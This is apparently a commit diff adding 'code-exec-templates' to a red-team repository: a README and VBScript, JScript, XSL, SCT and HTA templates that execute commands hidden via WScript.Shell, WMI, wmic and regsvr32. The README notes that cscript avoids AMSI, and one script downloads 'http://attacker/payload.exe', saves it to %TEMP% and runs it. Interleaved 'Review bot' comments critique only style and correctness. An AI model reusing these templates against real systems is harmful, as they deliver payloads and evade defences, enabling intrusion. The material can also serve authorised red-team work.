	Added code-exec-templates
		@@ -52,6 +52,8 @@ cmstp.exe /ni /s cmstp.inf
 | 
			
		||||
 | 
			
		||||
- **`cobalt-arsenal`** - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements.
 | 
			
		||||
 | 
			
		||||
- [**`code-exec-templates`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/code-exec-templates) - a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS)
 | 
			
		||||
 | 
			
		||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
 | 
			
		||||
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
 | 
			
		||||
 | 
			
		||||
 
 | 
			
		||||
							
								
								
									
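--- /dev/null
+++ b/red-teaming/code-exec-templates/README.md
@@ -0,0 +1,57 @@
+### A small collection of unobfuscated code-execution primitives in different languages
+
+A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
+
+Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
+
+- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
+
+- `wscript.exe` - For general scripts execution. **This one loads AMSI**
+
+
+#### VBScript
+
+- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
+
+- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
+
+- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
+
+- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
+
+
+#### JScript
+
+
+#### XSL
+
+XSL files can be executed in the following ways:
+
+- Using `wmic.exe`:
+```
+wmic os get /format:"jscript-xslt-template.xsl"
+```
+
+Templates:
+
+- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
+
+- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
+
+
+
+#### COM Scriptlets
+
+Sample code execution with `regsvr32` can be following:
+```
+regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
+```
+
+- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
+
+
+#### HTA
+
+HTA files are HTML Applications
+
+- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_ 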
							
								
								
									
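--- /dev/null
+++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs
@@ -0,0 +1,38 @@
+'
+' Example of downloading a binary file from the URL, saving it to the
+' local filesystem and then launching.
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+downloadURL = "http://attacker/payload.exe"
+saveAs = "%TEMP%\foo.exe"
+parameters = ""
+
+Dim sh: Set sh = CreateObject("WScript.Shell")
+out = sh.ExpandEnvironmentStrings(saveAs)
+
+' STEP 1: Download File
+Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
+xhr.Open "GET", downloadURL, False
+xhr.Send
+
+' STEP 2: Save binary file
+If xhr.Status = 200 Then
+    With CreateObject("Adodb.Stream")
+        .Open
+        .Type = 1
+        .write xhr.responseBody
+        .savetofile out, 2
+    End With
+
+    ' STEP 3: Execute file
+    cmd = out & " " & parameters
+    MsgBox cmd
+    sh.Run cmd, 0, False
+
+End If
+
+Set sh = Nothing
+Set xhr = Nothing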
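Review bot: `MsgBox cmd` under STEP 3 is an undocumented modal popup in a script whose header describes a non-interactive download-save-launch flow; at minimum mark it, e.g. `' Debug aid: displays the command before Run`, so a reader does not mistake the dialog for part of the flow. The header also leaves two behaviours unstated: a non-200 `xhr.Status` silently skips STEP 2 and STEP 3, and `xhr.Send` raises an unhandled runtime error when the host is unreachable because the script has no `On Error` handling. One sentence in the header covering both would make the template's failure modes clear.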
							
								
								
									
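--- /dev/null
+++ b/red-teaming/code-exec-templates/hello-world-jscript-xslt.xsl
@@ -0,0 +1,15 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+<ms:script implements-prefix="user" language="JScript">
+<![CDATA[
+
+// Hello world
+var shell = new ActiveXObject("WScript.Shell");
+shell.Popup("Hello world from JScript XSL!");
+
+]]> </ms:script>
+</stylesheet>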
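Review bot: The stylesheet declares `xmlns:user="placeholder"` and `implements-prefix="user"` but contains no `<template>` and never references a `user:` function, so nothing in the file documents why the script body runs at all; a comment at the top of the CDATA block explaining that the `ms:script` element is evaluated when the stylesheet is loaded (presumably by the transform engine — confirm) would help a reader unfamiliar with the MSXML extension. The same undocumented structure appears in the later `@@ -0,0 +1,14 @@` XSL hunk on this page (`wscript-shell-run-jscript-xslt.xsl` per the README).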
							
								
								
									
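--- /dev/null
+++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs
@@ -0,0 +1,20 @@
+'
+' This script uses WMI class' Win32_Process static method Create to 
+' execute given command in a hidden window (ShowWindow = 12).
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+computer = "."
+
+Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
+        & computer & "\root\cimv2")
+
+Set startup = wmi.Get("Win32_ProcessStartup")
+Set conf = startup.SpawnInstance_
+conf.ShowWindow = 12
+
+Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
+proc.Create command, Null, conf, intProcessID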
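Review bot: `proc.Create command, Null, conf, intProcessID` discards the method's return value, and `intProcessID` is neither declared nor read afterwards, so the script cannot tell whether process creation succeeded; capture it, `ret = proc.Create(command, Null, conf, intProcessID)`, and state in a comment that a non-zero `ret` means failure. The header's `(ShowWindow = 12)` also deserves a check: the Win32_ProcessStartup documentation lists ShowWindow values in the 0–11 range, so either the comment or the assigned value looks off and the two should be reconciled.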
							
								
								
									
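--- /dev/null
+++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs
@@ -0,0 +1,13 @@
+'
+' This script uses classic WScript.Shell Run method to
+' execute given command in a hidden window (second param = 0)
+'
+' Mariusz B. / mgeeky, <mb@binary-offensive.com>
+' (https://github.com/mgeeky)
+'
+
+command = "notepad.exe"
+
+With CreateObject("WScript.Shell")
+	.Run command, 0, False
+End With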
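Review bot: The header explains the second `Run` argument but not the third; `.Run command, 0, False` returns immediately because `bWaitOnReturn` is `False`, so the command's exit code is never available to the script. A comment such as `' third param False = do not wait for the command to finish` would complete the header and spare the reader a trip to the WScript.Shell documentation.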
@@ -0,0 +1,15 @@
 | 
			
		||||
<?XML version="1.0"?>
 | 
			
		||||
<scriptlet>
 | 
			
		||||
<registration         
 | 
			
		||||
progid="Foo"       
 | 
			
		||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
 | 
			
		||||
<script language="JScript">
 | 
			
		||||
<![CDATA[  
 | 
			
		||||
 | 
			
		||||
var command = "notepad.exe";
 | 
			
		||||
var r = new ActiveXObject("WScript.Shell").Run(command); 
 | 
			
		||||
 | 
			
		||||
]]>
 | 
			
		||||
</script>
 | 
			
		||||
</registration>
 | 
			
		||||
</scriptlet>
 | 
			
		||||
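Review bot: `<?XML version="1.0"?>` uses an upper-case declaration target; the XML specification defines the declaration as `<?xml ...?>` and reserves processing-instruction targets that match `xml` case-insensitively, so a strict parser may reject the file even if the scriptlet host tolerates it — `<?xml version="1.0"?>`, as the two XSL files on this page use, is the safe spelling. `var r = new ActiveXObject("WScript.Shell").Run(command);` also stores the `Run` result without using it; either drop the assignment or document what the value would be used for.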
@@ -0,0 +1,14 @@
 | 
			
		||||
<?xml version='1.0'?>
 | 
			
		||||
<stylesheet
 | 
			
		||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
 | 
			
		||||
xmlns:user="placeholder"
 | 
			
		||||
version="1.0">
 | 
			
		||||
<output method="text"/>
 | 
			
		||||
	<ms:script implements-prefix="user" language="JScript">
 | 
			
		||||
	<![CDATA[
 | 
			
		||||
 | 
			
		||||
	var command = "notepad";
 | 
			
		||||
	var r = new ActiveXObject("WScript.Shell").Run(command);
 | 
			
		||||
 | 
			
		||||
	]]> </ms:script>
 | 
			
		||||
</stylesheet>
 | 
			
		||||
@@ -0,0 +1,14 @@
 | 
			
		||||
<html>
 | 
			
		||||
<head>
 | 
			
		||||
<script language="VBScript"> 
 | 
			
		||||
    Sub foo
 | 
			
		||||
    	command = "notepad.exe"
 | 
			
		||||
        Set objShell = CreateObject("Wscript.Shell")
 | 
			
		||||
        objShell.Run command
 | 
			
		||||
    End Sub
 | 
			
		||||
foo()
 | 
			
		||||
</script>
 | 
			
		||||
</head> 
 | 
			
		||||
<body>
 | 
			
		||||
</body>
 | 
			
		||||
</html>
 | 
			
		||||
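Review bot: Indentation is inconsistent inside `Sub foo`: `command = "notepad.exe"` is tab-indented while the surrounding lines use four spaces, and the `foo()` call sits at column 0 although it belongs to the same script block; settling on one scheme would make the nesting readable. Unlike the `.vbs` templates on this page, the file also has no comment header; a short one stating what the backbone demonstrates would keep the collection consistent.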
@@ -0,0 +1,19 @@
 | 
			
		||||
'
 | 
			
		||||
' This script uses classic WScript.Shell Exec method to
 | 
			
		||||
' execute given command in a hidden window via StdIn passed to a dedicated
 | 
			
		||||
' launcher command (powershell.exe in this example).
 | 
			
		||||
'
 | 
			
		||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
 | 
			
		||||
' (https://github.com/mgeeky)
 | 
			
		||||
'
 | 
			
		||||
 | 
			
		||||
command = "notepad.exe"
 | 
			
		||||
launcher = "powershell -nop -w hid -Command -"
 | 
			
		||||
 | 
			
		||||
With CreateObject("WScript.Shell")
 | 
			
		||||
	With .Exec(launcher)
 | 
			
		||||
        .StdIn.WriteLine command
 | 
			
		||||
        .StdIn.WriteBlankLines 1
 | 
			
		||||
        .Terminate
 | 
			
		||||
    End With
 | 
			
		||||
End With
 | 
			
		||||
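Review bot: The inner `With .Exec(launcher)` line is tab-indented while its body lines (`.StdIn.WriteLine command` and following) use spaces, so the two nested `With` blocks do not line up and the structure is hard to read; align on one scheme. `.Terminate` is also the one call the header does not explain — a comment on that line stating why it is issued immediately after the StdIn writes would help a reader judge the ordering.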